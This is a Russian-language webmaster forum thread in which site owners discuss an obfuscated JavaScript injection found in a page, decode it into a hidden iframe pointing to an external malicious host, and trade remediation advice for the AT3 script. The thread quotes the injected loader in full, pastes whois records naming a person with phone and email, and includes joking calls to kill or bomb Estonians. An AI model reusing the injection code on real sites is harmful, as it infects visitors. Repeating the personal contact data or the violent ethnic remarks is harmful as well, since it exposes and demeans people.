Это взлом ?

Привет всем, тут только что обнаружил в хтмл на странице :

<script> var s='3C696672616D65207372633D22687474703A2F2F3139352E352E3131362E3235302F65782F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>

народ, что это за фигня ? Неужели сломали ?

угу - спрси админа как залезли - скорее всего или ftp или какойто дырявый скрипт - добавляют гадости в index - проверь все индексы

Последнее что updat-ил был Smart Thums. Буквально черес пол часа увидел это фигню. Хотя ftp тоже использовал.

Да, взлом.
Апдейти AT3 до 16 версии, меняй пароль в нем, закрывай доступ в админку htaccess и до кучи смени ftp пароль..
Также проверь свою машину на вирусы, вполне возможно что сидит дрянь и шаблон во время заливки могла подменить (всякое бывает).

PS. У меня сегодня 2 сайты пытались хакнуть, довольно оригинально, через css файл AT3.. Так что всем советую сделать то, что выше написал..

Что-то часто ломать начали, если есть возможность то разреши доступ по фтп и по всем остальным важным сервисам с определенного IP (желательно со своего) ...

DiamonD75 писал:

Да, взлом. PS. У меня сегодня 2 сайты пытались хакнуть, довольно оригинально, через css файл AT3.. Так что всем советую сделать то, что выше написал..

Интересно, как они пытались это сделать?;)

защита по айпи рулит

вот что в этой бяке

Код:

<iframe src="http://195.5.116.250/ex/static.php" width=2 height=2 style="display:none"></iframe>

данные хуиз следующие

Код:

по данным RIPE: % This is the Ripe-Mirror Whois server. % Note: this output has been filtered. % Information related to '195.5.116.0 - 195.5.117.255' inetnum:        195.5.116.0 - 195.5.117.255 netname:        EE-COMPIC descr:          Compic Ltd. country:        EE org:            ORG-CL48-RIPE admin-c:        RI215-RIPE tech-c:         RI215-RIPE status:         ASSIGNED PI mnt-by:         RIPE-NCC-HM-PI-MNT mnt-lower:      RIPE-NCC-HM-PI-MNT mnt-by:         AS3327-MNT mnt-routes:     AS3327-MNT mnt-domains:    AS3327-MNT source:         RIPE # Filtered organisation:   ORG-CL48-RIPE org-name:       Compic Ltd. org-type:       OTHER address:        Voru 1-28 address:        13612, Tallinn address:        Estonia phone:          +372 6321028 e-mail:         roman@compic.ee admin-c:        RI215-RIPE mnt-ref:        AS3327-MNT mnt-by:         AS3327-MNT source:         RIPE # Filtered person:       Roman Ivanov address:      V.ru 1-28 address:      13612, Tallinn address:      Estonia phone:        +3726321028 e-mail:       roman@compic.ee nic-hdl:      RI215-RIPE source:       RIPE # Filtered % Information related to '195.5.116.0/23AS39823' route:          195.5.116.0/23 descr:          Compic Ltd. origin:         AS39823 mnt-by:         AS3327-MNT source:         RIPE # Filtered

насобачь абуз пиши что они нанесли тебе материальный ущерб это теперь евросоюз там не сорвешься пиши что собираешься подовать иск снесут в три секунды

куда блин не глянь кругом до боли знакомые морды

Последний раз редактировалось: usanatol (14/12/07 в 23:51), всего редактировалось 1 раз

SAV писал:

защита по айпи рулит

это уменьшает шанс, но он остается и довольно большой.
чем больше разных скриптов, сервисов тем шансов больше что у тебя есть дырка... + шанс подхватить трояна. По этому поводу советую вообще не ставить никакого софта который не скачен с официальных сайтов. Но это реально сложно в наших условиях...

так вообще не понимаю, из скриптов только ат3 и смарт. Обработка хтмл только в нете. Каким блин образом.

Взломать могли любой сайт на сервере, не обязательно твоя вина.

Eddy писал:

из скриптов только ат3

Читай: Защищаем свои сиджи от взлома

Это конкретно твой случай. Даже код совпадает.

sir.korvin писал:

Интересно, как они пытались это сделать?;)

Боюсь сюда логи выкладывать, вдруг еще кто-то воспользуется.. Но вкратце, вместо файла css в итоге оказалось содержимое файла users путем заведения хитрого трейдера.. Айпи урода 195.5.116.245 (Эстонский гов#юк с s19.esthost.eu) :-) Админка само собой искарежилась, html без стиля.. Но так как вход в админку был закрыт htaccess, то вероятно дальше он не зашел..

Опа, только сейчас заметил, что айпи который выше в топике, рядышком стоит :-) Обломайте руки этому уроду!

Здравствуйте! Люди, у меня тут тоже атаки из Эстонии! Пробовали жаловаться админу? Роман Иванов блин... там хоть такой вообще есть? Мыло настоящее?

Ко мне регулярно ломятся двое, оба из Эстонии под началом организации ORG-CL48-RIPE, чтоб их

Инфы много, пора скидываться на эстонского киллера

Я против мокрухи, к сожалению(( Вы, надеюсь, преодолели сию трудность? Он от вас отвязался? У меня их двое, по крайней мере, айпи. Пробовали жаловаться админу?

Eddy писал:

Инфы много, пора скидываться на эстонского киллера

Чего там мелочиться - бомбочку серьезную надо - чтоб уж глобально вопрос с эстонцами порешать

у меня еще два вируса Backdoor.Trojan, которые не удаляются. Нортоном пробовала - никак. Чем их можно убить убить убить ??? Это ж, наверное, как-то связано с Эстонцами...

Я никому не жаловалса, тк думаю что это ничего не даст. Они пол инета на ат3 переломали, и до сих пор работают.

Значит жопы их защищены надёжно.

ПС.: У себя просто всё поудолял и каждый день поглядываю.

и почему прибалты нас так ненавидят ))

ну мы же типа оккупанты и были они рабами нашими когда-то.
жили мы и не тужили, попивая виски на дачах, а они на заводах поднимали нашу страну.

У меня тут вопрос еще один.. Вы уверены, что это прибалты?) Может, это мне не верится из-за чрезмерной распространенности анекдотов про Эстонию, конечно)) Тем не менее, возможно ли, поменяв айпи на "эстонский", находясь где-нибудь в Москве сидеть себе и спокойно без палева так рассылать скрипты? Просто вижу короткометражку: "О, а давай себе айпи поменяем, чтоб не палиться" - "Гы, давай, а на какой?" - "А давай на эстонский гыгыгы"-"гыгыгы".

Возможно такое с точки зрения с вашей?)

Хостинг прибалтийский, с админом я разговаривал, там colo сервак, который в свою очередь сдается третьим лицам.. Так что фиг знает кто там хостится..

Цитата:

ну мы же типа оккупанты и были они рабами нашими когда-то

так я не из россии, по идее они мне вообще траф гнать длжны

а по делу вполне могут быть эстонцы. Технологии уже на европейские тянут вполне, а вот насчёт расследования абуз ещё наверное не совсем. Кстати как у них там насчёт распространения порнографических материалов ?

Eddy писал:

Кстати как у них там насчёт распространения порнографических материалов ?

... они у вас крадут порнуху?